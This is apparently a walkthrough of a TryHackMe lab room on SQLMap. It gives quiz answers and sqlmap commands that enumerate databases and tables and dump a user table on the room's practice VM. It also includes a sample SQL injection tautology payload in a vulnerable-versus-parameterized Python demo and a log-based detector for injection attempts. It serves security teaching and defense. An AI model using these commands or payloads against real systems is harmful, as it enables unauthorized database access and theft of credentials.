SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium Room | SuNnY



The Full Writeup for this Room can also be found on my Medium Page -

>> Sunny Singh Verma || Medium Profile <<

Kudos to the Creators of this Room




Room Type

Only subscribers can deploy virtual machines in this room! Go to your profile page to subscribe (if you have not already). Do note: a Premium Subscription is required to solve this room.

Let’s Start the Party

This writeup is a part of TryHackMe’s Learning Path → Cyber Security 101

Check this Learning Path here → >> Cyber Security 101 Learning Path <<

Task 1 : Introduction

It’s advised to give this module a good read before proceeding to Task 2.

Let’s proceed to Task 2

Task 2 : SQL Injection Vulnerability

Task 2 — Question 1 : Which boolean operator checks if at least one side of the operator is true for the condition to be true?

The boolean operator that checks if at least one side of the condition is true for the entire condition to be true is the OR operator.

Task 2 — Question 2 : Is 1=1 in an SQL query always true? (YEA/NAY)

The Answer is YEA, in an SQL query, 1=1 is always true.
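
Why these two answers matter for a login form, as an added example that is not part of the original writeup or the room's material: the same tautology run against a query built by string concatenation and against a parameterized one. The table, the sample row and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for a login backend.
    # The password is stored in plaintext only to keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (email TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('alice@example.test', 's3cret')")
    return db

def login_concat(db, email, password):
    # Vulnerable: request values are pasted into the SQL text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT email FROM user WHERE email = '%s' AND password = '%s'"
           % (email, password))
    return db.execute(sql).fetchall()

def login_param(db, email, password):
    # Hardened: placeholders keep the values as data, never as SQL syntax.
    sql = "SELECT email FROM user WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR 1=1 -- "
    # AND binds tighter than OR, so the WHERE clause becomes
    # (email = 'test' AND password = 'x') OR 1=1, which is true for every row.
    print("concatenated :", login_concat(db, "test", tautology))
    print("parameterized:", login_param(db, "test", tautology))
```
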


Task 2 Complete !

Task 3 : Automated SQL Injection Tool

Task 3 Question 1 : Which flag in the SQLMap tool is used to extract all the databases available?

--dbs

Task 3 Question 2 : What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: https://sqlmaptesting.thm/search/cat=1)

sqlmap -u https://sqlmaptesting.thm/search/cat=1 -D members --tables


Task 3 Complete !

Task 4 : Practical Exercise

This is a Practical Module. Let’s fire up the VM before proceeding (Start Machine).

The Room recommends Starting AttackBox

1. Let’s open the browser and navigate to this page → https://10.10.249.16/ai/login

2. We are greeted with a login page.

3. Right-click on the page and select Inspect (or press Ctrl + Shift + I / Cmd + Option + I on Mac).

4. In the developer tools, navigate to the Network tab.

5. To capture the GET request from the browser, let’s use test as the username and test as the password → test:test (this is also used and demonstrated in the module of this room).

6. Then refresh the Network tab and we will get the GET request.

7. We can copy this URL to solve the further questions in this task.






So we have our Target URI with us →

https://10.10.249.16/ai/includes/user_login?email=test&password=test

Do note → your IP can be different from the IP I got in this room; just replace the IP with yours.

Let’s now Answer the Questions →

Task 4 Question 1 : How many databases are available in this web application?

Using our target URL let’s find the answer

Run the SQLMap command with the --dbs flag to list all the databases. The output will show the number of databases available in the application.

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" --dbs --level=5

Note → Don’t forget to wrap the URL inside " ". Otherwise the shell treats the & in the URL as a command separator, the --dbs flag gets ignored and an error is returned.

After executing the command, SQLMap will output a list of databases. The correct answer can be inferred from this output.






Answer is 6

available databases [6]:
[*] ai
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test        

Task 4 — Question 2 : What is the name of the table available in the “ai” database?

Using the same Target URI we are going to solve this question →

After identifying the available databases, use the SQLMap command with the -D ai --tables flags to fetch the tables from the "ai" database.

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai --tables --level=5

Note → Again , Don’t forget to wrap the URL inside “ ”

SQLMap will list the tables in the specified database →





Answer to Task 4 Question 2 is →

Users        

Task 4 Question 3 : What is the password of the email [email protected]?

Using the same Target URI as the above questions we are going to solve this final question as well !

After you know the table name (in this case, “user”), use the SQLMap command to dump the records from that table, specifying the database and table.

sqlmap -u "https://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai -T user --dump --level=5

Note → Again as always , Don’t forget to wrap the URL inside “ ” to avoid errors
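
How a scan like the ones above can be spotted in the web server's access log, as an added example that is not part of the original writeup or the room's material. The log lines are constructed, and the Apache combined log format and the `triage` helper are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not taken from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /ai/includes/user_login?email=test&password=test HTTP/1.1" 200 31 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [01/Jan/2025:10:00:07 +0000] "GET /ai/includes/user_login?email=test&password=test HTTP/1.1" 200 31 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2025:10:00:08 +0000] "GET /ai/includes/user_login?email=test%27%20AND%205=5--%20&password=test HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [01/Jan/2025:10:00:09 +0000] "GET /ai/includes/user_login?email=o%27brien%40example.test&password=pw HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Macintosh)"
"""

# Client address, request target and User-Agent of one combined-format line.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')

# Heuristic: a quote followed by a SQL keyword, a comment marker, or a delay call.
# A lone apostrophe (as in o'brien) is deliberately not enough to flag a request.
SQLI_RE = re.compile(
    r"'\s*(?:or|and|union|select)\b|--|/\*|\b(?:sleep|benchmark)\s*\(", re.I)

def triage(log_text):
    """Return (client, reasons) for every request that looks like SQLi probing."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, target, agent = m.groups()
        reasons = []
        # The default sqlmap User-Agent names the tool. The header is
        # client-controlled, so treat it as a weak signal only.
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap user-agent")
        # Inspect the decoded parameter values so detection does not rely on the header.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if SQLI_RE.search(value):
                reasons.append("sql syntax in " + name)
        if reasons:
            findings.append((client, reasons))
    return findings

if __name__ == "__main__":
    for client, reasons in triage(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```
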






Task 4 and the Room => Done !

Congrats ! We have now solved all the tasks of this room !

Hope you have enjoyed solving this room as much as I did.



Thank you ! SuNnY

